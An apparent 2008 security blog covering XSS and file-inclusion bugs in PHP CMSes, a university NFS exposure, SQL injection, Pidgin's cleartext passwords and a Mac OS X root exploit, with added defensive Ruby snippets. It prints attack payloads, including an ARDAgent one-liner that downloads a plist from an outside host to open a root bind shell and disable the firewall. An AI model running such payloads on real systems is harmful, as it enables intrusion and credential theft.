
"There is nothing either good or bad, but thinking makes it so." - Shakespeare

28th - June - 2008 - 02:00

TGS CMS admin page XSS


I was a bit bored after coming back from work, having worked five hours longer than normal, so I decided to look a bit at some Content Management Systems and search for vulnerabilities. Quite quickly I found one in a CMS called TGS, which stands for "The Green Smurf". I set up the CMS on my local machine, reachable at 127.0.0.1:8080. Then I looked at some files and found two bugs in the admin panel. So first I had to log in on the following page: cms/login.php; then I was redirected to cms/index.php?site=main, and here we have the vulnerabilities:

if (isset($_GET['msg'])) {
?>
<tr><td><center><table align="center"  width="100%" \
border="0" bgcolor="#ffb3b5"><tr><td>
<font class='errorBox'><img border='0' src='images/errorBox.gif'> \
&nbsp;<?php echo $_GET['msg']; ?></font>
</tr></table></center></td></tr>
<?php 
}

And the other one:

if (isset($_GET['msg'])) {
?>
<tr><td><center><table align="center"  width="100%" \
border="0" bgcolor="#05c27d"><tr><td>
<font class='errorBox'><img border='0' src='images/goodBox.gif'> \
&nbsp;<?php echo $_GET['goodmsg']; ?></font>
</tr></table></center></td></tr>
<?php 
}

So, to make this whole thing interesting, make an admin click on a manipulated link when he is logged in and redirect his/her cookie to you! The XSS works like this:

XSS #1: http://.../cms/index.php?site=main&msg=[XSS]

XSS #2: http://.../cms/index.php?site=main&goodmsg=[XSS]

The advisory can be found [here].
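
Added example (my own Ruby, not TGS code): the same two message boxes rendered with output encoding, which is the fix for the raw echo shown above. The parameter names msg and goodmsg come from the post; the function names and the test URL are my own. Ruby is used for this and the other examples on this page because the site's own tools are Ruby.

```ruby
require 'cgi'
require 'erb'

# Parameters the admin page reflects into the HTML (names from the post).
MESSAGE_PARAMS = %w[msg goodmsg].freeze

# Pull msg/goodmsg out of a URL like the ones in the post. CGI.parse
# percent-decodes the values, so %3Cscript%3E arrives as <script>.
def message_params(url)
  query = url.split('?', 2)[1].to_s
  params = CGI.parse(query)
  MESSAGE_PARAMS.each_with_object({}) do |name, out|
    out[name] = params[name].first if params.key?(name)
  end
end

# What the original code does: echo $_GET['msg'] straight into the page,
# so anything that looks like markup is parsed as markup.
def unsafe_render(value)
  "<font class='errorBox'>&nbsp;#{value}</font>"
end

# Hardened form: <, >, &, " and ' become entities, so the value is shown as
# text no matter what it contains.
def escape_message(value)
  ERB::Util.html_escape(value.to_s)
end

def render_box(name, value)
  icon = name == 'msg' ? 'errorBox.gif' : 'goodBox.gif'
  "<font class='errorBox'><img border='0' src='images/#{icon}'>&nbsp;#{escape_message(value)}</font>"
end

# Render whichever boxes the request carries, like the two if-blocks above.
def render_boxes(url)
  message_params(url).map { |name, value| render_box(name, value) }
end
```

The check that matters is the last assertion: after escaping, the rendered box no longer contains a `<script>` tag, only its entity form.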

27th - June - 2008 - 22:00

APROX CMS ENGINE V5(.1.0.4) LFI


Some days ago I published an advisory on Milw0rm that describes a Local File Inclusion bug in a CMS called Aprox. Let's look at the bug a bit closer. First we have the following code:

if (!isset($_GET["id"]))
{
if ((isset($_GET["page"])) && ($_GET["page"] != "")){
if (file_exists("./engine/inc/".$_GET["page"].".inc")){

So you might already see what the problem will be: the parameter "page" is taken from the GET request and there is no filtering or validation at all. So let us check what happens with this parameter:

include("./engine/inc/".$_GET["page"].".inc");

WHUPS! It gets included and there are NO checks. That's our time to jump in and manipulate the parameter. Let us put "../../../xampp/xampp-changes.txt" in it (information: on my Vista machine I don't have a boot.ini anymore, so I test such bugs with the TXT file of XAMPP, which I used for testing). The call will fail with the following error:

Fehler - Datei nicht gefunden!

This translates to: "Error - File not found!". That's no wonder; let's look at the whole include call:

include("./engine/inc/../../../xampp/xampp-changes.txt.inc");

This file does not exist, of course, but we can make it work by simply appending a terminating NULL byte. Let's do it with "../../../xampp/xampp-changes.txt%00". Now it works and we get the following text:

14. Feb 2008 XAMPP 1.6.6a - Upgrade to MySQL 5.0.51a - ...

That is the text written in xampp-changes.txt! Now you can include whatever you want (locally), like "../../../etc/passwd%00" on Linux/Unix or "../../../boot.ini%00" on Windows.

For the whole advisory look [here] or check out [Milw0rm].
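
Added example (my own Ruby, not Aprox code): the include() above redone with input validation, which closes both the directory traversal and the NULL-byte trick from this post. The base path mirrors "./engine/inc/" from the script; INC_DIR, the error class and the function names are my own.

```ruby
require 'cgi'

# Base directory of the includable pages (assumed; mirrors "./engine/inc/").
INC_DIR = File.expand_path('./engine/inc')

class UnsafePageParameter < StandardError; end

# The web server percent-decodes the query string before the script sees it,
# so %00 in the URL becomes a real NUL byte in the parameter.
def decode_param(raw)
  CGI.unescape(raw.to_s)
end

# Return the absolute path of "<page>.inc" under base, or raise.
def resolve_include(page, base = INC_DIR)
  raise UnsafePageParameter, 'empty page' if page.nil? || page.empty?
  # A NUL byte would let the C-level open() stop reading the name before ".inc".
  raise UnsafePageParameter, 'NUL byte in page' if page.include?("\0")
  # Only a plain page name is legitimate; this also rules out "/" and "..".
  raise UnsafePageParameter, 'illegal characters in page' unless page.match?(/\A[A-Za-z0-9_-]+\z/)
  # Defence in depth: resolve the path and confirm it is still inside base.
  candidate = File.expand_path("#{page}.inc", base)
  raise UnsafePageParameter, 'path escapes include dir' unless candidate.start_with?(base + File::SEPARATOR)
  candidate
end

# Convenience predicate for a raw (still URL-encoded) parameter value.
def safe_page?(raw)
  resolve_include(decode_param(raw))
  true
rescue UnsafePageParameter
  false
end
```

The whitelist regex alone would already reject every payload from the post; the expand_path check is kept so that a later relaxation of the regex cannot silently reopen the traversal.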

27th - June - 2008 - 17:00

(IN)Security of the University of Ulm


Last weekend I looked closer at the security of the University of Ulm, the university of the city I live in. I have the great advantage that I have a machine inside the network, because I live in a house that is connected to the university's campus network. I scanned the whole network and did some simple tests to check out their systems. One thing made me curious: the server located at ftp.uni-ulm.de or ftp.rz.uni-ulm.de (they are the same). So first of all let's look at this with nslookup:

# nslookup ftp.uni-ulm.de
Server:         134.60.1.111
Address:        134.60.1.111#53

ftp.uni-ulm.de  canonical name = ftp.rz.uni-ulm.de.
Name:   ftp.rz.uni-ulm.de
Address: 134.60.1.5

# nslookup ftp.rz.uni-ulm.de
Server:         134.60.1.111
Address:        134.60.1.111#53

Name:   ftp.rz.uni-ulm.de
Address: 134.60.1.5

As we can see, both names resolve to 134.60.1.5. Now let's check this server for open ports:

# nmap -sV -P0 ftp.uni-ulm.de

Starting Nmap 4.53 ( http://insecure.org ) at 2008-06-27 16:42 CEST
Interesting ports on ftp.rz.uni-ulm.de (134.60.1.5):
Not shown: 1700 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   open     ftp          vsftpd 2.0.6
22/tcp   open     ssh          SunSSH 1.1 (protocol 2.0)
80/tcp   open     http         Apache httpd 2.2.4 ((Unix))
111/tcp  open     rpc
119/tcp  open     nntp         Netwinsite DNEWS 5.6f3 (posting OK)
135/tcp  filtered msrpc
136/tcp  filtered profile
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
445/tcp  filtered microsoft-ds
514/tcp  open     tcpwrapped
873/tcp  open     rsync         (protocol version 30)
2049/tcp open     rpc
4045/tcp open     rpc
Service Info: Host: procyon.rz.uni-ulm.de; OS: Unix

Service detection performed. Please report any incorrect results \
at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.894 seconds

As we can see we get another interesting piece of information here: the server is internally called procyon.rz.uni-ulm.de and it has RPC open! Now let's check this RPC:

# rpcinfo -p procyon.rz.uni-ulm.de
   program vers proto   port
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  32777  status
    100024    1   tcp  32791  status
    100133    1   udp  32777
    100133    1   tcp  32791
1073741824    1   tcp  32792
    100007    3   udp  32780  ypbind
    100007    2   udp  32780  ypbind
    100007    1   udp  32780  ypbind
    100007    3   tcp  32793  ypbind
    100007    2   tcp  32793  ypbind
    100007    1   tcp  32793  ypbind
    100021    1   udp   4045  nlockmgr
    100021    2   udp   4045  nlockmgr
    100021    3   udp   4045  nlockmgr
    100021    4   udp   4045  nlockmgr
    100021    1   tcp   4045  nlockmgr
    100021    2   tcp   4045  nlockmgr
    100021    3   tcp   4045  nlockmgr
    100021    4   tcp   4045  nlockmgr
    100005    1   udp  32788  mountd
    100005    1   tcp  32794  mountd
    100005    2   udp  32788  mountd
    100005    2   tcp  32794  mountd
    100005    3   udp  32788  mountd
    100005    3   tcp  32794  mountd
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100227    2   udp   2049
    100227    3   udp   2049
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100227    2   tcp   2049
    100227    3   tcp   2049
    100242    1   tcp  32796
    100230    1   tcp  32797
    100011    1   udp  32789  rquotad
    100229    1   tcp  53368
    100229    2   tcp  53368

Interesting: look at port 2049, there is an NFS service running, in versions 2 and 3. So let's check the NFS exports:

# showmount -e procyon.rz.uni-ulm.de
Exports list on procyon.rz.uni-ulm.de:
/campus/install                    .rz.uni-ulm.de
/campus/opensuse                   .uni-ulm.de
/campus/suse                       .uni-ulm.de
/campus/solaris                    .uni-ulm.de
/campus/adsm                       .uni-ulm.de
/ftp                               EVERYONE

Whups... /ftp can be mounted by EVERYONE? Interesting. Now let's mount it:

# mount -t nfs procyon.rz.uni-ulm.de:/ftp /mnt

It worked! Now we have (at least) read-only access to the whole /ftp directory of the Sun Solaris 10 server. I did not look too deep into the directory, but there are folders like apache, apache-extra, vsftpd and more... I think this was not expected to happen, so I informed the helpdesk of the university about this problem! I got in contact with a friendly guy who was quite shocked about what I had found and asked me not to do anything malicious. I told him I wouldn't and suggested he fix this. He did, and now look at the exports list again:

# showmount -e procyon.rz.uni-ulm.de
Exports list on procyon.rz.uni-ulm.de:
/ftp/beta                          .rz.uni-ulm.de
/campus/install                    .rz.uni-ulm.de
/campus/opensuse                   .uni-ulm.de
/campus/suse                       .uni-ulm.de
/campus/solaris                    .uni-ulm.de
/campus/adsm                       .uni-ulm.de
/ftp/ftpdata                       urzunix

Now it's fixed and the University of Ulm is a bit more secure again!
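
Added example (my own Ruby, not a tool from this post): a parser for `showmount -e` output that flags exports any host may mount, run over the two listings above. It is the check the university could have run itself; the "(everyone)" and "*" spellings are added because other showmount implementations print those instead of EVERYONE.

```ruby
# The two export listings from the post, before and after the fix.
EXPORTS_BEFORE_FIX = <<~TXT
  Exports list on procyon.rz.uni-ulm.de:
  /campus/install                    .rz.uni-ulm.de
  /campus/opensuse                   .uni-ulm.de
  /campus/suse                       .uni-ulm.de
  /campus/solaris                    .uni-ulm.de
  /campus/adsm                       .uni-ulm.de
  /ftp                               EVERYONE
TXT

EXPORTS_AFTER_FIX = <<~TXT
  Exports list on procyon.rz.uni-ulm.de:
  /ftp/beta                          .rz.uni-ulm.de
  /campus/install                    .rz.uni-ulm.de
  /campus/opensuse                   .uni-ulm.de
  /campus/suse                       .uni-ulm.de
  /campus/solaris                    .uni-ulm.de
  /campus/adsm                       .uni-ulm.de
  /ftp/ftpdata                       urzunix
TXT

# Spellings of "anyone may mount" from different showmount implementations:
# the post's Solaris box prints EVERYONE, others print "(everyone)" or "*".
WORLD_TOKENS = ['EVERYONE', '(everyone)', '*'].freeze

# Returns [[export_path, [client, ...]], ...], skipping the header line.
def parse_exports(text)
  text.each_line.each_with_object([]) do |line, out|
    line = line.strip
    next if line.empty? || line.start_with?('Export')
    path, clients = line.split(/\s+/, 2)
    out << [path, clients.to_s.split(',').map(&:strip)]
  end
end

# Paths that are mountable from anywhere: the finding of this post.
def world_mountable(text)
  parse_exports(text)
    .select { |_, clients| clients.any? { |c| WORLD_TOKENS.include?(c) } }
    .map(&:first)
end

# Exports granted to a whole domain suffix (".uni-ulm.de") rather than to a
# host or netgroup: not open to the world, but worth a second look.
def domain_wide(text)
  parse_exports(text)
    .select { |_, clients| clients.any? { |c| c.start_with?('.') } }
    .map(&:first)
end
```

Run against the first listing the world-mountable list is exactly ["/ftp"]; against the corrected listing it is empty, while the domain-wide exports remain for review.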

27th - June - 2008 - 00:30

Code Injection?

Today a friend of mine sent me a PHP script, for which he wanted to know whether it is vulnerable to SQL injection, as he is going deeper into that topic at the moment. I looked at the script and was quite sure that SQL injection won't work, for the following reason: the password gets hashed with MD5 (using PHP's md5() function). Look at the code:

[...]
$anmeldename=$_POST['anmeldename'];
$passwort=$_POST['passwort'];
$sql="SELECT * FROM `member` WHERE `Anmeldename`='$anmeldename'";
$erg=mysql_query($sql);
$zeile = mysql_fetch_object($erg);
$spw=md5($passwort);
if($zeile->Passwort==$spw)
[...]

As you can see the command gets executed, but why? Simple answer: because of the backticks! So if we chose a system command for the $passwort variable in the script, that command would get executed. In our special case it did not work, but why? That can have several reasons; one could be that magic_quotes_gpc is set to "on", which MIGHT forbid this, or maybe other special options in the server's php.ini file are set that forbid such actions... The script per se is vulnerable, only the server config secures it.


UPDATE: A dude I know from the last PH-Neutral informed me about a big mistake I made and flamed me a bit *smile* ... His name is Joern or Joernchen and he drew my attention to the PHP manual, especially the function md5(), which I talked about before.

Beschreibung
string md5 ( string $str [, bool $raw_output ] )

Berechnet den MD5-Hash von str unter Verwendung des RSA Data Security,
Inc. MD5 Message-Digest Algorithm und gibt das Ergebnis zurück.

Which translates to: Calculates the MD5 hash of str using the RSA Data Security, Inc. MD5 Message-Digest Algorithm and returns the result.

Conclusion: NO CODE INJECTION, but how about using the variable $anmeldename and filling it with this: 1' ; insert into [table] hacker,md5(hacker) --... Have fun! Thanks for the help!


UPDATE 2: I was emailed and messaged by different people about the first UPDATE I did on this topic. I have to say sorry for the wrong information I gave: mysql_query does NOT support stacked queries. Furthermore I have to say that mysql_multi_query or multi_query does, but that has not been used in our special case. Hope this has been the last update on this news *smile*.
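
Added example (my own Ruby, not the friend's PHP script): it shows the two points of this post side by side. md5() only hashes its argument, backticks included, and attacker-controlled text concatenated into the Anmeldename query lands in the part the SQL parser reads as code, which a bind parameter avoids. Whether a second, stacked statement would run depends on the API, as UPDATE 2 says; the single-statement OR payload below needs no stacking. The segment splitter handles only single-quoted literals and is my own.

```ruby
require 'digest/md5'

# 1. Hashing a password that contains backticks yields a 32-hex-digit digest;
#    nothing is executed, the backticks are just bytes of the input.
def hashed_password(passwort)
  Digest::MD5.hexdigest(passwort)
end

# 2. The query shape from the script, built by string concatenation.
def unsafe_login_sql(anmeldename)
  "SELECT * FROM `member` WHERE `Anmeldename`='#{anmeldename}'"
end

# The same query with a bind parameter: the SQL text is constant and the
# value travels separately to the driver (the prepared-statement shape).
def parameterized_login(anmeldename)
  ["SELECT * FROM `member` WHERE `Anmeldename`=?", [anmeldename]]
end

# Split SQL into [:code, text] and [:data, text] segments, where :data is the
# content of a single-quoted literal ('' inside a literal is an escaped quote).
def sql_segments(sql)
  segments = []
  buf = +''
  in_literal = false
  i = 0
  while i < sql.length
    c = sql[i]
    if in_literal && c == "'" && sql[i + 1] == "'"
      buf << "'"
      i += 2
      next
    end
    if c == "'"
      if in_literal
        segments << [:data, buf]
      elsif !buf.empty?
        segments << [:code, buf]
      end
      buf = +''
      in_literal = !in_literal
    else
      buf << c
    end
    i += 1
  end
  segments << [in_literal ? :data : :code, buf] unless buf.empty?
  segments
end

# Everything the parser will interpret as SQL, i.e. outside string literals.
def code_text(sql)
  sql_segments(sql).select { |kind, _| kind == :code }.map(&:last).join
end
```

With a normal user name the code text is the fixed query skeleton; with "1' OR '1'='1" an OR appears in it, which is what changes the meaning of the statement. With the bind-parameter form the code text never changes, whatever the input.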

23rd - June - 2008 - 19:00

Crazy reverse engineering

I got an email from Tatsumori with some very funny and fresh news on the topic of RE (Reverse Engineering); read it yourself:

Some of you may know that I work as a research engineer and
get to deal with fresh malware on a regular basis. Those of
you who either work in the security sector or take part in
the good old AV vs. VX vs. Blackhats challenge will also know
that stepping through a piece of malcode isn't really the same
as disassembling winmine.exe. Apart from the fact that most
people who actually release malware into the wilderness just
can't be convinced to include debugging information (come on
guys, be "1337") we today face a lot of techniques that
were specially designed to make an analyst's life harder.

Most notably we face Anti-Debugging and Anti-Reversing. (And
of course anti-anti-anti-foo... the list goes on.) Then there
are some other techniques that aren't directly geared towards
researchers but try to accomplish something else, like for
example escalating privileges or circumventing the firewall.
I'm not going into detail here either, but everyone who has a
shortcut for "launch notepad.exe in OllyDBG, break on new thread
and dump the process id to a file" should know what I mean.

And then there are those moments where you just want to shout,
because someone invented something completely new. Some days ago
I was facing some good malware. The name may not be mentioned, so
let's just call it "XY" for clarity's sake. XY pulled about every
trick in the book, including - among others - indirect calls,
process injection, debugger detection and encryption. Those
could be defeated using some careful engineering and lots of
coffee. Somewhere in the code I ran into this statement
(obfuscated):

-=ASM=-
push ebp
call loc_XYZ
pop ebp
-=/ASM=-

This is something we see almost every day. A regular internal function
call. By quickly checking over XYZ, I could see that it contained a
lot of crypto-foo. Thus I tried to see what it changed before going
into more detail and decided to step over the function.
Interestingly enough, the malware crashed with a memory violation.
Now that is not very unusual either, since anti-debugging techniques
tend to lead to this result, but just to make sure, I loaded a snapshot
and hit F9 from the same spot. But while it should have crashed again
right then, it just exited gracefully. I decided to set a breakpoint
on pop ebp manually, to check if this was a bug in the debugger. The
results were the same as when stepping over. The malware crashed.
This began to confuse me. But it still had to get a little worse.
I removed the software breakpoint on pop ebp and replaced it with a
hardware breakpoint. Now the program didn't crash, but it didn't stop
either. It just ran through.

Confused enough yet? Bear with me for another minute.

I couldn't figure this one out. And luckily lunch break came up quickly.
While returning to the office, two of my coworkers were arguing over
which way to walk. "This way is more direct" "This one is faster" "But
I need to go to that store". Suddenly something in my brain shifted.
When we arrived at the office, I was soon bent over laughing.

What happened?
Their conversation was the missing piece. It made me realize one
essential fact: loc_XYZ never returned the flow of execution to
the calling function at all. Whoever wrote this used the function
call like a jmp instruction. It was a one way path. Later during
the analysis I was able to discover a piece of code, that then
checked if "pop ebp" had been modified. By setting a software
breakpoint and stepping over, "pop ebp" had become "CC CC". The
malware noticed this and faked a crash to hinder the analysis. This
also explained why running the malware and setting a hardware
breakpoint didn't do anything. push ebp remained unchanged.

Sometimes we need to keep our eyes open for new possibilities. To my
friends from the AV: Good luck on generating a working fingerprint
for this one.

Original post: [observed.de].

22nd - June - 2008 - 22:45

Owning Mac OS X


It is not the first time I have read about the new "Mac OS X Root Exploit", but people are talking more and more about it; even Heise has now printed news on this exploit. The problem is present in the ARDAgent of Mac OS X 10.4 and 10.5, which stands for Apple Remote Desktop and is part of the remote management of Apple computers. The ARDAgent has the SUID bit set and furthermore you can launch AppleScript code through the agent, which will then run as root. The exploit works if you have physical access to a machine or can type into a console, for example having remote access via SSH to a server. On Slashdot an example "exploit" has been posted, looking like this:

osascript -e 'tell app "ARDAgent" to do shell script
"cd /System/Library/LaunchDaemons ; curl -o bash.plist
http://cdslash.net/temp/bash.plist [cdslash.net] ;
chmod 600 bash.plist ; launchctl load bash.plist ;
launchctl start com.apple.bash ; ipfw disable firewall;
launchctl"'

The bash.plist file looks like the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" \
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Disabled</key>
	<false/>
	<key>Label</key>
	<string>com.apple.bash</string>
	<key>Program</key>
	<string>/bin//bash</string>
	<key>ProgramArguments</key>
	<array>
		<string>bash</string>
		<string>-i</string>
	</array>
	<key>inetdCompatibility</key>
	<dict>
		<key>Wait</key>
		<false/>
	</dict>
	<key>Sockets</key>
	<dict>
		<key>Listeners</key>
		<dict>
			<key>SockServiceName</key>
			<string>9999</string>
			<key>Bonjour</key>
			<false/>
		</dict>
	</dict>
</dict>
</plist>

One way to solve this problem would be to remove the SUID bit from the ARDAgent by typing "chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent".
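
Added example (my own Ruby, not Apple's or the post's code): an audit that lists setuid files under a directory and strips the bit, which is the chmod u-s step above done programmatically. The ARDAgent path is the one from the post; the demo creates a throwaway setuid file in a temporary directory so that nothing on the real system is modified.

```ruby
require 'tmpdir'

# Path from the post; only inspected, never changed, by check_binary.
ARDAGENT_PATH = '/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent'

def setuid?(path)
  File.file?(path) && File.stat(path).setuid?
end

# Recursively list setuid files beneath dir (hidden files included).
def setuid_files(dir)
  Dir.glob(File.join(dir, '**', '*'), File::FNM_DOTMATCH)
     .select { |p| setuid?(p) }
     .sort
end

# Equivalent of `chmod u-s path`: clear only the setuid bit, keep the rest.
# Returns true when the bit is gone afterwards.
def strip_setuid(path)
  mode = File.stat(path).mode & 0o7777
  File.chmod(mode & ~0o4000, path)
  !setuid?(path)
end

# Report for a single binary such as ARDAgent: nil if absent, else [path, setuid?].
def check_binary(path = ARDAGENT_PATH)
  return nil unless File.exist?(path)
  [path, setuid?(path)]
end

# Self-contained run in a temporary directory; no system files are touched.
def suid_audit_demo
  Dir.mktmpdir('suid-audit') do |dir|
    bin = File.join(dir, 'agent')
    File.write(bin, "#!/bin/sh\necho agent\n")
    File.chmod(0o4755, bin)
    before = setuid_files(dir).map { |p| File.basename(p) }
    strip_setuid(bin)
    [before, setuid_files(dir)]
  end
end
```

Pointing setuid_files at /System/Library/CoreServices on an affected machine would list ARDAgent among the results; check_binary answers the narrower question for that one path.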

21st - June - 2008 - 06:30

Takedown


After a long hacking session this night, which will continue now, I watched the movie Takedown, which tells the story of Kevin Mitnick. The movie is known to be not very realistic, but nevertheless it is very popular and in my opinion a very nice movie. It shows different aspects of the hacker subculture that you can still find nowadays. What do I actually mean? I would have to go too deep into personal things relating to the German subculture... Think about it yourself! A short description:

The hacker Kevin David Mitnick hacks into a system called SAS, which
stands for Switched Access Control and is a service of the Southern
California telephone company to the FBI, so that they are able to listen
to every phone call. Because of this hack he has to run away from the
agents and for more than two years he does not get caught. Most of the
time in the movie Kevin Mitnick virtually "fights" against the computer expert
Tsutomu Shimomura, who works for the Super Computer Center in San Diego.
They even meet once, but Kevin is able to flee. Kevin gets access to
the computer of Tsutomu and downloads a directory called "contempt",
which he finds out is a virus...

Remember: The movie is UNREALISTIC (but nice!).

20th - June - 2008 - 21:30

BackTrack 3.0 Final released


After a long time developing the new version of BackTrack, the third version has finally been released. It comes in three variants now: a CD version as always, a USB version and a VMware image. The kernel is 2.6.21.5 and a lot of new cool stuff has been added, such as SAINT in a specially licensed version for BackTrack. Very nice! I can only suggest you download the version that fits your needs and start playing:

Description: CD Image
Name: bt3-final.iso
Size: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
Download: http://remote-exploit.org/cgi-bin/fileget?version=bt3-cd

Description: USB Version (Extended)
Name: bt3final_usb.iso
Size: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
Download: http://remote-exploit.org/cgi-bin/fileget?version=bt3-usb

Description: VMware Image
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
Download: http://remote-exploit.org/cgi-bin/fileget?version=bt3-vm

Be patient! At the moment the servers are totally overloaded (how about Torrents in future?)!

19th - June - 2008 - 00:30

Pidgin (In)Security


Pidgin is available in version 2.4.2 at the moment. It is an instant messaging program that is available for many different operating systems and supports many chat protocols, such as ICQ, MSN, Jabber, IRC, SILC and many, many more. It is a great program, no question, BUT, and here comes what I will criticize now: it has a major insecurity! All the information of Pidgin is written to a directory called ".purple". The most important files there are accounts.xml and blist.xml. What are those files for? accounts.xml saves the login information for your configured accounts, as the name says... and blist.xml contains all your contacts, those on your local buddy list and those that are only saved server-side! All this is still no problem at all, BUT: ALL INFORMATION IS SAVED IN CLEARTEXT!

On Linux/Unix/BSD etc. operating systems you can find the folder .purple in your home folder; on Windows (Vista) it is saved in C:\Users\...\AppData\Roaming. So let's look at those files:

<?xml version='1.0' encoding='UTF-8' ?>
<purple version='1.0'>
<blist>
<group name='Buddies'/>
<group name='MSN_2'>
<setting name='collapsed' type='bool'>0</setting>
<contact>
<buddy account='*' proto='prpl-msn'>
<name>*@*.*</name>
<alias>*</alias>
<setting name='buddy_icon' type='string'>*.png</setting>
<setting name='icon_checksum' type='string'>*</setting>
<setting name='last_seen' type='int'>*</setting>
</buddy>
</contact>
[...]

Okay, that's how the blist.xml file is built, not THAT interesting so far, but now comes the shock. Look at accounts.xml:

<?xml version='1.0' encoding='UTF-8' ?>
<account version='1.0'>
<account>
<protocol>prpl-icq</protocol>
<name>300852578</name>
<password>*</password>
<alias>SkyOut</alias>
[...]
<account>
<protocol>prpl-msn</protocol>
<name>rooter05@freenet.de</name>
<password>*</password>
<alias>SkyOut</alias>
[...]
<account>
<protocol>prpl-jabber</protocol>
<name>cr3x@jaim.at/0x00</name>
<password>*</password>
<alias>SkyOut</alias>
[...]

If it were written like this, all would be fine, but instead of * you can see the password in CLEARTEXT! This is a major insecurity. Everyone having access to the computer could easily read your passwords and your buddy list. The scenario is the following: you get infected by a virus. The virus targets Pidgin, reads out your passwords, then reads your buddy list and silently sends instant messages over your accounts to your contacts. Those contacts will trust this instant message because it is from a "friend" of theirs and they won't see that it is an auto-generated message created by a virus. A worm would easily be possible.

We are in the 21st century and computer security should be far better than saving passwords in cleartext. I don't know why the authors of Pidgin are still using this old technique of saving information... At least a hashed value should be used... To prove the risk of such insecure usage I coded a tool in Ruby called [pidgindump.rb] that will read out the information for ICQ, MSN and Jabber accounts. You can find it in "Releases" -> "Others"!

I hope for other people blogging about this and giving the authors of Pidgin a big black press, so they will change it soon!
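
Added example (my own Ruby, not pidgindump.rb): an audit that parses an accounts.xml in the shape shown above and reports which accounts carry a stored password, without ever returning the password itself. The sample file is constructed with placeholder secrets; the path lookup follows the locations named in the post (~/.purple on Unix-like systems, %APPDATA%\.purple on Windows) and is an assumption.

```ruby
require 'rexml/document'

# Constructed sample in the layout from the post; secrets are placeholders.
SAMPLE_ACCOUNTS_XML = <<~XML
  <?xml version='1.0' encoding='UTF-8' ?>
  <account version='1.0'>
  <account>
  <protocol>prpl-icq</protocol>
  <name>123456789</name>
  <password>placeholder-icq-secret</password>
  <alias>SkyOut</alias>
  </account>
  <account>
  <protocol>prpl-msn</protocol>
  <name>user@example.com</name>
  <alias>SkyOut</alias>
  </account>
  <account>
  <protocol>prpl-jabber</protocol>
  <name>user@example.org/0x00</name>
  <password>placeholder-jabber-secret</password>
  <alias>SkyOut</alias>
  </account>
  </account>
XML

# Returns [protocol, name] for every account whose <password> element is
# present and non-empty. The secret is read only to test for presence.
def cleartext_password_accounts(xml)
  doc = REXML::Document.new(xml)
  REXML::XPath.match(doc, '/account/account').each_with_object([]) do |acct, out|
    pw = acct.elements['password']
    next if pw.nil? || pw.text.to_s.empty?
    out << [acct.elements['protocol'].text, acct.elements['name'].text]
  end
end

# Default location of accounts.xml on the platforms named in the post (assumed).
def accounts_xml_path
  base = ENV['APPDATA'] ? File.join(ENV['APPDATA'], '.purple') : File.join(Dir.home, '.purple')
  File.join(base, 'accounts.xml')
end

# Audit the real file if present; an absent file yields an empty report.
def audit_file(path = accounts_xml_path)
  return [] unless File.exist?(path)
  cleartext_password_accounts(File.read(path))
end
```

Against the sample the ICQ and Jabber accounts are reported and the MSN account, which has no stored password, is not.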

18th - June - 2008 - 17:30

Firefox 3 and Wine 1.0


After a long time of development Firefox 3 has finally been released, with more than 15,000 big or small changes and improvements. It is said to be faster and should need less memory. The bookmark management is now based on a database, which makes it easier to find and manage bookmarks. If you have multiple tabs open you can now smoothly scroll between them. In my opinion the most interesting changes have been made on the Mac OS X side of Firefox. Instead of using the old Carbon libraries, Firefox now uses Cocoa, which makes it far more efficient and ready for 64 bit! One negative thing has to be said anyway: in the [Acid3 Test] Firefox 3 scores 71/100, which could be better, but let's see if this gets improved soon in Firefox 3.1. Furthermore the CSS 3 compatibility is not as good as in Opera 9.5. But apart from that Firefox 3 is a great step in the right direction!

Download Firefox 3 on [mozilla.com/firefox]!


After 15(!) years of development and beta testing, Wine has been released in its final version, called Wine 1.0! Of course this does not mean that development will stop now, but it is a big step in the right direction and thousands of applications are perfectly supported, as you can read in the [Wine Application Database (AppDB)]. The source code for Wine 1.0 is now available on [sourceforge.net]. The binary packages should follow as soon as their maintainers make them available!

16th - June - 2008 - 09:30

Phishmarket :: gov && mil :: 2008

In the tradition of the first and second Phishmarkt, a new one is going to be released NOW! The first time we announced the Phishmarkt was in October 2006, called Phishmarkt :: de :: en ::, which showed vulnerabilities in about 70 German online banking sites and about 50 other sites, like universities or other companies with an online presence. This first Phishmarkt was available in two different languages, in German, as it can be found [here], and in an [english version]. It was a great success and most of the sites fixed the problem, some earlier, some later and some (blame them!) never! After a few months the second Phishmarkt followed, called [Phishmarkt :: at ::], because it showed vulnerabilities in Austrian bank sites. This project was done because Austrian banks had announced they were secure: they were not!

So enough of history for now. Here comes the new Phishmarkt, called Phishmarkt :: gov && mil :: 2008. All in all 47 vulnerable governmental institutions are listed and 8 military websites that are attackable through XSS (in our case: IFrame spoofing). Here comes the TOP 5 of the websites shown to be vulnerable:

Place 1 goes to: cia.gov
Place 2 goes to: gmao.gsfc.nasa.gov
Place 3 goes to: cdmrp.army.mil
Place 4 goes to: www.onr.navy.mil
Place 5 goes to: I couldn't decide... xP

Yes, you read right: CIA.gov! Unbelievable, but true...

I will send information about this new project to several sites now and hope for their support in making this public and giving those sites a black press!


And finally, check it out: [baseportal.com/baseportal/phishmarkt/commix]!

15th - June - 2008 - 23:30

ShmooCon 2008 videos online


The videos of this year's ShmooCon event are now finally online. You can find them on [shmoocon.org/2008/videos]!

